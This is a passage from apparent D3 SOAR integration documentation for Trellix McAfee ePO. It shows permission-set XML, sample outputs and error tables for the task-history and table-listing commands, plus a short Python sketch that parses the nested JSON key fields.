		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""9"">
		    <name>Group Active Response Workspace Monitor</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.searchRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.read</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.viewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""10"">
		    <name>Group Active Response Workspace Responder</name>
		    <roles>
		      <role>
		        <roleUri>role:mar-server.reactionRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:tie.manager</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.collectorRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.triggerRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-workspace.workspace.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.searchRole.write</roleUri>
		      </role>
		      <role>
		        <roleUri>role:mar-server.reactionRole.run</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""11"">
		    <name>Global Reviewer</name>
		    <roles>
		      <role>
		        <roleUri>role:ENDP_FW_META.ENDP_FW_META_FW.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.MVEDR___META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DLPPS___1000.DLPPS___1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.viewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MVEDR___META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.MARCOBA_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:issue.auditor?type=issue.type.untyped</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEMGMT_META.TIEMGMT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:assessment.assessment.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MARCOBA_META.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLCLNT_META.DXLCLNT_META.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:softman.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.ENDP_GS_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.dir.access</roleUri>
		        <customRoleInfo roleFactoryId=""epo.dir"">
		          <systems>
		            <system>\</system>
		          </systems>
		        </customRoleInfo>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:EPOAGENTMETA.EPOAGENTMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ahRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rs.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.audit.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:DXLBROKRMETA.DXLBROKRMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.query.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_AM_1000.ENDP_AM_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TIEClientMETA.TIEClientMETA.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:rollup.execute</roleUri>
		      </role>
		      <role>
		        <roleUri>role:UDLPSRVR2013.UDLPSRVR2013.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:TELEMTRY1000.TELEMTRY1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.guest</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCPSRVER1000.MCPSRVER1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_WP_1000.ENDP_WP_1000.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ubpRole.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.distViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.event.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:notes.viewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:scheduler.view</roleUri>
		      </role>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:ENDP_GS_1000.tasks.reviewer</roleUri>
		      </role>
		      <role>
		        <roleUri>role:MCA_____1000.MCA_____1000.reviewer</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		  <permissionSet id=""12"">
		    <name>TestPermissonSets</name>
		    <roles>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		    </roles>
		  </permissionSet>
		</list>
		"
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[]\"",
    "description": "\"[]\"",
    "enabled": "\"[]\"",
    "endDate": "\"[]\"",
    "id": "\"[]\"",
    "name": "\"[]\"",
    "nextRunTime": "\"[]\"",
    "startDate": "\"[]\"",
    "valid": "\"[]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
"; Group Admin role:repoRole.masterViewOnly role:epo.core.view.tree role:core.addressbook.admin role:core.dash.user role:epo.core.modify.tree role:response.rule.admin role:epo.productevents.view role:scheduler.view role:notes.fullPerms role:epo.core.deploy.agent role:core.audit.reviewer role:epo.event.view role:epo.core.wakeup.agent role:epo.core.tag.assign role:notes.overRide role:epo.core.tagcat.user role:core.query.user role:ubpRole.viewOnly role:ahRole.viewOnly role:repoRole.distViewOnly Group Reviewer role:core.addressbook.guest role:core.dash.viewer role:epo.productevents.view role:scheduler.view role:epo.event.view role:notes.viewOnly role:core.query.guest role:epo.core.view.tree role:response.rule.user Executive Reviewer role:epo.productevents.view role:core.query.guest role:epo.dir.access \ role:core.dash.viewer role:core.addressbook.guest role:epo.event.view Group McAfee Investigator FW role:copperfieldFw.write MCP Catalog Admin role:MCPSRVER1000.MCPSRVER1000.admin role:common.catalog.data.general?catalogId=15e08086-c60e-4a69-93e4-a3be38b455f9&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile= Group Active Response Editor role:mar-server.collectorRole.write role:mar-server.triggerRole.write role:mar-server.searchRole.write role:MARCOBA_META.MARCOBA_META.admin role:mar-server.reactionRole.write Group Active Response Responder role:MARCOBA_META.MARCOBA_META.reviewer role:mar-server.reactionRole.read role:mar-server.collectorRole.read role:mar-server.triggerRole.read role:mar-server.searchRole.write Group Active Response Workspace Monitor role:mar-server.searchRole.read role:mar-workspace.workspace.read 
role:mar-server.collectorRole.read role:tie.viewer Group Active Response Workspace Responder role:mar-server.reactionRole.write role:tie.manager role:mar-server.collectorRole.write role:mar-server.triggerRole.write role:mar-workspace.workspace.write role:mar-server.searchRole.write role:mar-server.reactionRole.run Global Reviewer role:ENDP_FW_META.ENDP_FW_META_FW.reviewer role:EPOAGENTMETA.tasks.reviewer role:MVEDR___META.MVEDR___META.reviewer role:DLPPS___1000.DLPPS___1000.reviewer role:epo.core.view.tree role:core.dash.viewer role:MVEDR___META.tasks.reviewer role:MARCOBA_META.MARCOBA_META.reviewer role:response.rule.admin role:issue.auditor?type=issue.type.untyped role:TIEMGMT_META.TIEMGMT_META.reviewer role:assessment.assessment.reviewer role:MARCOBA_META.tasks.reviewer role:DXLCLNT_META.DXLCLNT_META.reviewer role:softman.viewOnly role:ENDP_WP_1000.tasks.reviewer role:ENDP_GS_1000.ENDP_GS_1000.reviewer role:epo.dir.access \ role:ENDP_AM_1000.tasks.reviewer role:EPOAGENTMETA.EPOAGENTMETA.reviewer role:ahRole.viewOnly role:rs.user role:core.audit.reviewer role:DXLBROKRMETA.DXLBROKRMETA.reviewer role:core.query.guest role:ENDP_AM_1000.ENDP_AM_1000.reviewer role:TIEClientMETA.TIEClientMETA.reviewer role:rollup.execute role:UDLPSRVR2013.UDLPSRVR2013.reviewer role:TELEMTRY1000.TELEMTRY1000.reviewer role:core.addressbook.guest role:MCPSRVER1000.MCPSRVER1000.reviewer role:ENDP_WP_1000.ENDP_WP_1000.reviewer role:epo.productevents.view role:ubpRole.viewOnly role:repoRole.distViewOnly role:epo.event.view role:notes.viewOnly role:scheduler.view role:repoRole.masterViewOnly role:ENDP_GS_1000.tasks.reviewer role:MCA_____1000.MCA_____1000.reviewer TestPermissonSets

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including the Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List Running Server Task failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

List Running Server Task failed.

Status Code: 401.

Message: Unauthorized.

List Sub Task History

Retrieves a list of subtask history based on the provided task log ID.

Reader Note

Task Log ID is a required parameter to run this command.

  • Run the List Running Server Task command to obtain Task Log ID. Task Log IDs can be found in the returned raw data at the path $[*].taskLogId.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Task Log ID | Required | The ID of the task log to retrieve corresponding subtask history. Task log IDs can be obtained using the List Running Server Task command. | 8*****7 |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "name": "Send DXL Event",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "name": "Send Email",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "name": "Send DXL Event",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    },
    {
        "name": "Send Email",
        "startDate": "2019-11-25T14:07:50-08:00",
        "endDate": "2019-11-25T14:07:50-08:00",
        "userName": "system",
        "status": "Completed",
        "taskSource": "response",
        "duration": "Less than a minute"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"name\\\": \\\"Computer Name: DXL\\\",\\r\\n        \\\"startDate\\\": \\\"2022-12-06T13:08:48-08:00\\\",\\r\\n        \\\"endDate\\\": \\\"2022-12-08T14:00:01-08:00\\\",\\r\\n        \\\"userName\\\": \\\"admin\\\",\\r\\n        \\\"status\\\": \\\"Failed\\\",\\r\\n        \\\"taskSource\\\": \\\"runNowTaskSource\\\",\\r\\n        \\\"duration\\\": \\\"48 hours 51 minutes\\\"\\r\\n    }\\r\\n]\"",
    "duration": "\"[\\r\\n \\r\\n  \\\"Less than a minute\\\",\\r\\n \\r\\n  \\\"Less than a minute\\\"\\r\\n \\r\\n ]\"",
    "endDate": "\"[\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\"\\r\\n \\r\\n ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"Send DXL Event\\\",\\r\\n \\r\\n  \\\"Send Email\\\"\\r\\n \\r\\n ]\"",
    "startDate": "\"[\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\",\\r\\n \\r\\n  \\\"2019-11-25T14:07:50-08:00\\\"\\r\\n \\r\\n ]\"",
    "status": "\"[\\r\\n \\r\\n  \\\"Completed\\\",\\r\\n \\r\\n  \\\"Completed\\\"\\r\\n \\r\\n ]\"",
    "taskSource": "\"[\\r\\n \\r\\n  \\\"response\\\",\\r\\n \\r\\n  \\\"response\\\"\\r\\n \\r\\n ]\"",
    "userName": "\"[\\r\\n \\r\\n  \\\"system\\\",\\r\\n \\r\\n  \\\"system\\\"\\r\\n \\r\\n ]\""
}
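The values in the Key Fields sample above are JSON arrays that were serialized to a string more than once, one array per field. The following Python sketch is an added illustration, not code from D3 or Trellix: it unwraps those layers and rebuilds one record per task. The function names are hypothetical, and the sample input is constructed (shortened from the sample above, with one status changed to Failed).

```python
import json

# Constructed sample, shortened from the Key Fields sample above.
# One status is changed to "Failed" so the filter below has something to find.
KEY_FIELDS_JSON = r'''
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"name\\\": \\\"Send Email\\\"\\r\\n    }\\r\\n]\"",
    "name": "\"[\\r\\n  \\\"Send DXL Event\\\",\\r\\n  \\\"Send Email\\\"\\r\\n]\"",
    "status": "\"[\\r\\n  \\\"Completed\\\",\\r\\n  \\\"Failed\\\"\\r\\n]\"",
    "userName": "\"[\\r\\n  \\\"system\\\",\\r\\n  \\\"system\\\"\\r\\n]\""
}
'''


def load_key_fields(text):
    """Parse the outer Key Fields object; its values are still encoded strings."""
    return json.loads(text)


def unwrap(value, max_depth=5):
    """Decode a value that was JSON-serialized one or more times.

    Stops as soon as the value is no longer a string or is not valid JSON.
    Caveat: a plain string such as "123" is also valid JSON and becomes 123.
    """
    for _ in range(max_depth):
        if not isinstance(value, str):
            return value
        try:
            value = json.loads(value)
        except json.JSONDecodeError:
            return value  # plain text, not another layer of JSON
    return value


def key_fields_to_records(key_fields):
    """Turn parallel per-field arrays into one dict per task.

    Fields that do not decode to a flat list of scalars (for example
    "Output", which holds whole objects) are skipped.
    """
    columns = {}
    for key, raw in key_fields.items():
        decoded = unwrap(raw)
        if isinstance(decoded, list) and not any(
            isinstance(item, (dict, list)) for item in decoded
        ):
            columns[key] = decoded

    lengths = {len(values) for values in columns.values()}
    if len(lengths) > 1:
        # Arrays of different lengths cannot be aligned by index safely.
        raise ValueError(f"key field arrays differ in length: {sorted(lengths)}")

    count = lengths.pop() if lengths else 0
    return [{key: values[i] for key, values in columns.items()} for i in range(count)]


def failed_tasks(records):
    """Names of tasks whose status is anything other than Completed."""
    return [r["name"] for r in records if r.get("status") != "Completed"]


if __name__ == "__main__":
    recs = key_fields_to_records(load_key_fields(KEY_FIELDS_JSON))
    for rec in recs:
        print(rec)
    print("not completed:", failed_tasks(recs))
```
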
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| name | startDate | endDate | userName | status | taskSource | duration |
| --- | --- | --- | --- | --- | --- | --- |
| Send Email | 11/25/2019 2:07:50 PM | 11/25/2019 2:07:50 PM | system | Completed | response | Less than a minute |
| Send DXL Event | 11/25/2019 2:07:50 PM | 11/25/2019 2:07:50 PM | system | Completed | response | Less than a minute |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | List Sub Task History failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 400. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: 'taskLogId' must be an integer less than 9223372036854775808. |

Error Sample Data

List Sub Task History failed.

Status Code: 400.

Message: 'taskLogId' must be an integer less than 9223372036854775808.

List Table

Retrieves a list of all tables.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "name": "workloaddetailVcenter.table.name",
        "target": "workloaddetailVcenter",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------ ------- ---------- -------- ------ -------\r\n id int True True False True True \r\n ePOLeafNodeId int True True False True True \r\n status string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------\r\n sasvmsetting\r\n vminfovcenter\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n --------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n workloaddetailVcenter ePOLeafNodeId ePOLeafNode AutoID False False True \r\n workloaddetailVcenter ePOLeafNodeId vminfovcenter EPO_LEAF_NODE_ID False False True \r\n workloaddetailVcenter id sasvmsetting sarVMStatusId False False True \r\n"
    },
    {
        "name": "Network discovery scan error",
        "target": "UDLP_Operational_NetworkDiscoveryFailure_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Network discovery scan error details",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- -------------------- ------- ---------- -------- ------ -------\r\n EventID long False False False True True \r\n ScanUsername udlp_searchable_text True True True True False \r\n Reason enum True True True True False \r\n ReasonDetails string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Data at Rest (Endpoint) Incidents History",
        "target": "UDLP_EPD_Incidents_Archive",
        "type": "join",
        "databaseType": "",
        "description": "All incidents related to data at rest (Endpoint)",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------------ -------------------------------- ------- ---------- -------- ------ -------\r\n IncidentId long True True True True True \r\n OriginalIncidentId long True True True True True \r\n IncidentType enum True True True True False \r\n ViolationLocalTime udlp_abstimestamp_endpoint_col True True True True False \r\n ViolationTimezone string_lookup True True True True False \r\n ViolationUTCTime udlp_abstimestamp_col True True True True False \r\n ViolationCustomTime udlp_abstimestamp_withoffset_col True True True True False \r\n ComputerID int False False False True True \r\n UserID int False False False True True \r\n Severity enum True True True True False \r\n StatusId udlp_common_status_col True True True True False \r\n ResolutionId udlp_common_resolution_col True True True True False \r\n Reviewer udlp_reviewer_col True True True True False \r\n McAfeeAgentGuid udlp_searchable_text True True True True False \r\n DlpAgentVersion string_lookup True True True True False \r\n EvidenceCount int True True True True True \r\n TotalMatchCount int True True True True True \r\n TotalContentSize udlp_kilo_col True True True True True \r\n PolicyInfoId int False False False True True \r\n ClassificationsToDisplay string True False False True False \r\n RulesToDisplay string True False True True False \r\n RuleSetToDisplay string True False True True False \r\n ConnectivityState enum True True True True False \r\n ActualAction enum True True True True False \r\n ExpectedAction enum True True True True False \r\n FailureReason enum True True True True False \r\n LastUpdateTimestamp udlp_abstimestamp_col True True True True False \r\n ReportingProduct enum True True True True False \r\n ShortMatchString udlp_contains_words_col True False False True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------------------------------------\r\n UDLP_EPD_IncidentDiscoverySummary_Archive\r\n UDLP_EventComputers\r\n UDLP_EventUsers\r\n UDLP_EPD_IncidentLabelsView_Archive\r\n UDLP_EPD_IncidentRules_Archive\r\n UDLP_EPD_IncidentEvidences_Archive\r\n UDLP_IncidentResolutions\r\n UDLP_EPD_IncidentExport\r\n UDLP_IncidentStatuses\r\n UDLP_EventPolicyInfo\r\n UDLP_EPD_IncidentClassification_Archive\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------------- ------------------- --------------- ----------- ------------\r\n UDLP_EPD_Incidents_Archive ComputerID UDLP_EventComputers ID False False True \r\n UDLP_EPD_Incidents_Archive UserID UDLP_EventUsers UserId False False True \r\n UDLP_EPD_Incidents_Archive StatusId UDLP_IncidentStatuses StatusID False False True \r\n UDLP_EPD_Incidents_Archive ResolutionId UDLP_IncidentResolutions ResolutionID False False True \r\n UDLP_EPD_Incidents_Archive PolicyInfoId UDLP_EventPolicyInfo PolicyInfoId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentRules_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentLabelsView_Archive LabelIncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentDiscoverySummary_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentEvidences_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentClassification_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentExport IncidentId False False True \r\n"
    },
    {
        "name": "groupinfo.table.name",
        "target": "groupinfo",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------ ------- ---------- -------- ------ -------\r\n GROUP_NAME string True False False True False \r\n AUTO_ID int True True False True True \r\n PARENT_ID int False True False True True \r\n ACCOUNT_ID int False True False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "epoproductproperties.table.name",
        "target": "epoproductproperties",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------ ------- ---------- -------- ------ -------\r\n ParentID int True True False True True \r\n ProductCode string True True False True False \r\n ProductVersion string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Active Response Server Properties",
        "target": "EPOProdPropsView_MARSERVER",
        "type": "join",
        "databaseType": "",
        "description": "McAfee Active Response Server Properties",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------- -------------- ------- ---------- -------- ------ -------\r\n LeafNodeID int False False False True True \r\n ProductPropertiesID int False False False True True \r\n ProductFamily string False False False True False \r\n FamilyDispName string False False False True False \r\n ProductCode string False False False True False \r\n productversion productVersion True True True True False \r\n language string_enum True True True True False \r\n hotfix string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n EPOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n EPOProdPropsView_MARSERVER LeafNodeID EPOLeafNode AutoID False True False \r\n"
    },
    {
        "name": "Resolutions",
        "target": "UDLP_IncidentResolutions",
        "type": "join",
        "databaseType": "",
        "description": "Resolutions",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------------------ ------- ---------- -------- ------ -------\r\n ResolutionID long False False False True True \r\n ResolutionKey udlp_fk_lookup_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Discovery Scans",
        "target": "UDLP_DiscoveryScansRegDocView",
        "type": "join",
        "databaseType": "",
        "description": "Status of Discovery scans",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- --------------------- ------- ---------- -------- ------ -------\r\n ScanId string False False False True False \r\n Name string_lookup True True True True False \r\n ServerName string_lookup False True False True False \r\n ServerMachineName string_lookup False True False True False \r\n StartTime udlp_abstimestamp_col True True True True False \r\n EndTime udlp_abstimestamp_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Mobile Device Information",
        "target": "UDLP_IncidentMobileDevice_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Mobile Device Information",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------------- -------------------- ------- ---------- -------- ------ -------\r\n IncidentId long False False False True True \r\n MobileDeviceID udlp_searchable_text True True True True False \r\n MobileOs enum True True True True False \r\n MobileUserAgent udlp_searchable_text True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Manual Registration Documents Classification",
        "target": "UDLP_RegisterDocumentsClassification",
        "type": "join",
        "databaseType": "",
        "description": "Manual Registration Documents Classification",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------ ------------- ------- ---------- -------- ------ -------\r\n RegDocID int False False False True True \r\n ClassificationID string False False False True False \r\n ClassificationName string_lookup False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Threat Intelligence Exchange Server Roll-up Properties",
        "target": "EPORollup_ProductPropertiesTIE",
        "type": "join",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------------------ ------- ---------- -------- ------ -------\r\n ServerId non_arithmetic_int False False False True False \r\n ParentId non_arithmetic_int False False False True False \r\n ExternalId non_arithmetic_int False False False True False \r\n productversion productVersion True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------------\r\n EpoRollup_Computers\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------------------------ ----------------- ------------------- ------------------- --------------- ----------- ------------\r\n EPORollup_ProductPropertiesTIE ServerId,ParentId EpoRollup_Computers ServerId,ExternalId False True False \r\n"
    },
    {
        "name": "vpcflowLog.table.name",
        "target": "vpcflowLog",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------------- ------ ------- ---------- -------- ------ -------\r\n AUTO_ID int True True False True True \r\n LATEST_TRAFFIC_END_TIME string True True False True False \r\n EPO_LEAF_NODE_ID int True True False True True \r\n ANALYSIS int True True False True True \r\n FROMTO_ADDRESS string True True False True False \r\n FROMTO_PORT int True True False True True \r\n NUMBER_OF_OCCURANCES int True True False True True \r\n TRAFFIC_TYPE int True True False True True \r\n TRAFFIC_ACTION int True True False True True \r\n IS_NEW int True True False True True \r\n",
        "relatedTables": "\r\n Name\r\n --------------\r\n gridthreatlist\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------ -------------- ----------------- ------------------- --------------- ----------- ------------\r\n vpcflowLog EPO_LEAF_NODE_ID ePOLeafNode AutoID False False True \r\n vpcflowLog AUTO_ID gridthreatlist VPC_FLOWLOG_ID False False True \r\n"
    },
    {
        "name": "AWS Volume Properties",
        "target": "MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid",
        "type": "target",
        "databaseType": "",
        "description": "Volume properties specific to Volume from Amazon Web Service ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- ------ ------- ---------- -------- ------ -------\r\n VOLUME_AUTO_ID int False False False True True \r\n instance_device string True True True True False \r\n reserved_for_root string True True True True False \r\n snapshot_id string True True True True False \r\n tags string True True True True False \r\n volume_size string True True True True False \r\n volume_state string True True True True False \r\n create_time string True True True True False \r\n volume_type string True True True True False \r\n encryption_status string True True True True False \r\n alias_key_name string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n MDCC_VOLUME\r\n",
